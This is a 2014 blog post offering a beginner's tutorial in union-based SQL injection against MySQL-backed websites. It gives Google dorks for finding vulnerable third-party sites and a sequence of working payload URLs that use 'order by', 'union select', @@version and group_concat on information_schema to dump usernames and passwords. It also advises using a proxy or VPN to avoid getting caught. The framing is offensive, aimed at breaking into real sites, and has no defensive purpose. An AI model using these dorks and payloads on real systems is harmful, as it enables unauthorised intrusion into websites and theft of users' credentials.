Monday, 10 November 2014

SQL Injection Tutorial For Beginners


What is a SQL Injection?

A SQL Injection is a method used by people which allows them to get inside of a MySQL database through the website.

What can I do with an SQLi?

You can extract data such as passwords, usernames, locations, and also change the site in which you can put whatever you want on it.

Is it hard to do?

At first, it may take you some time to get used to the queries. But after some practice, it's very easy.

Will I get caught?

If you are not using a proxy or VPN (Virtual Private Network), then yes there is a chance that you may be caught. I suggest reading the Proxies and Socks forum on here to learn more about what these are.

What is a dork?
A dork is a phrase that you see at the end of most URLs. In SQL Injection, you search for dorks to find a website that looks as though it may be vulnerable for injecting

Injection Tutorial
Step 1.

Search Google by typing in a dork and clicking one of the website that show up.

Common Dorks

inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=
Vulnerable Sites #1
Vulnerable Sites #2
Vulnerable Sites #3

So what does dork do ?
It's way of searching .
The above dorks will yield a vulnerable site that will used for testing
put the any one of the dork in google search and it will yield a vulnerable site


Step 2. Once you have found a site, it's time that we check if it is vulnerable to a SQL Injection.

So let's say we have a site like this
Quote:http://www.site.com/index.php?id=1

What we do is put a ' (single quote) after the number in order to get an error to show up on the page.
Quote:http://www.site.com/index.php?id=1'

You should get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1" or something.


Step 3. After getting the error, we know it's vulnerable to SQL Injection. Now we have to find out how many columns it has. We use the "order by" function to do this


Quote:http://www.site.com/index.php?id=1 order by 10

Now, I suggest you go by 10's. If you did order by a number and it shows an error, that means to use a lower number. We need to use a number and not get any errors, then use the number right after the number we used and get an error.

So let's say we did:

order by 10 (error)
order by 7 (no error)
order by 8 (no error)
order by 9 (error)

What this means is that there are 8 columns.

Step 4. Now that we have the number of columns, it's time to figure out which column is vulnerable so that we can extract data from it. We can do this by putting a "-" minus sign after the = equals sign in the url and by using the union select function. After union select, write every number that leads to the number of columns, separated by a comma.

So here's how it should look:
Quote:http://www.site.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8

After you do this, you should should get one or more of the numbers of columns in the database to show up on screen.

Step 5. Let's say a number 2 popped up on the screen. That means that column number 2 is vulnerable. Now we need to get the version of the database. We do this by using the @@version function.
Quote:http://www.site.com/index.php?id=-1 union select 1,@@version,3,4,5,6,7,8

Replace the number 2 in the url with @@version to get the version number to show up on your screen. Now the numbers that show up should either be 5.(some numbers) or 4.(some numbers).

For SQL Version 5 Injection:
Step 1. Now that we have the version number, it's time to get the name of the tables within the database. We use the group_concat(table_name) function. Since it's version 5, the tables are already in 1 big table named information_schema. We use -- to execute our command.

Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--

Step 2. On the screen, a bunch of names should pop up. Those are the names of the tables. Now, what you need to look for anything that might look like it contains the usernames and passwords from everyone who uses the website. Some common ones are users, admin, members, staff, user, etc.

Step 3. Once you have found something that might contain the usernames and passwords, it's time to get the name of the columns within that table. We use the group_concat(column_name) function to achieve this. And once again, in version 5, the columns are within information_schema.columns this time.

After the information_schema.columns, you need to tell the database which table you want to extract the columns. So after .columns, you put where table_name=(Name of table in hex form)
Now to convert the name of the table you're extracting from into Hex form, you need to use an online converter. What I use is Text to Hex Converter. After you have the hex, put 0x before it and copy all of the numbers/letters and paste them after the = equals sign.

So after all that it should look like this:
Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273

The name of the columns should pop up on your screen.

Step 4. Now that you have the column names within the table name you chose, it's time to extract the data. Once again, we will use the group_concat function.

Let's say that the column names that showed up were username,password. To extract the information, we put group_concat(username,0x3a,password) from users-- (The table name that you chose in TEXT form not Hexed). (Note: 0x3a is the hex form of a colon, which separates the usernames and passwords so you don't get confused.) After you've done this, you're url should look like this:

Quote:http://www.site.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users--

Now the usernames of people should show up, then a colon, then the passwords of the usernames.


Thank you for reading

Related Posts:

  • Heartbleed Vulnerability exploitation Hi HACKERS, In recent weeks, the Heartbleed vulnerability of OpenSSL has been dominating the information security headlines. This vulnerability enables an attacker to extract data from the server's memory that ma… Read More
  • Penetration Testing What is the advantage of Penetration Testing Distribution?All Required application for security test are gathered in a single Operating system. You don't need to search for application, Save your time. Penetration Testing Di… Read More
  • Exploiting OpenSSL-Heartbleed Detecting OpenSSL-Heartbleed with Nmap & Exploiting with Metasploit You can now quickly detect the OpenSSL-Heartbleed vulnerability very quickly on a network using the ever popular nmap command, and with the lat… Read More
  • String Based SQL injection What is String Based SQL injection and how to notice them?To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displa… Read More
  • Vulnerabilities for Any Website Using Nikto [kali linux] How to Find Vulnerabilities for AnyWebsite Using Nikto Before attacking any website, it's critical to do good reconnaissance. A few minutes of recon can save you hours on a hack. Simply trying various attacks without fir… Read More

2 comments:

  1. Block beauty25 December 2015 at 05:56

    Block printing allowed the creation of decorative fabrics that were more affordable and lighter weight than traditional decorative fabrics like velvet and embroidered textiles.
    Block Printing Classes in Bangalore|Block Printing on Cloth | Block Printing Classes in Bangalore

    ReplyDelete
  2. Unknown21 November 2017 at 11:08

    Well written

    ReplyDelete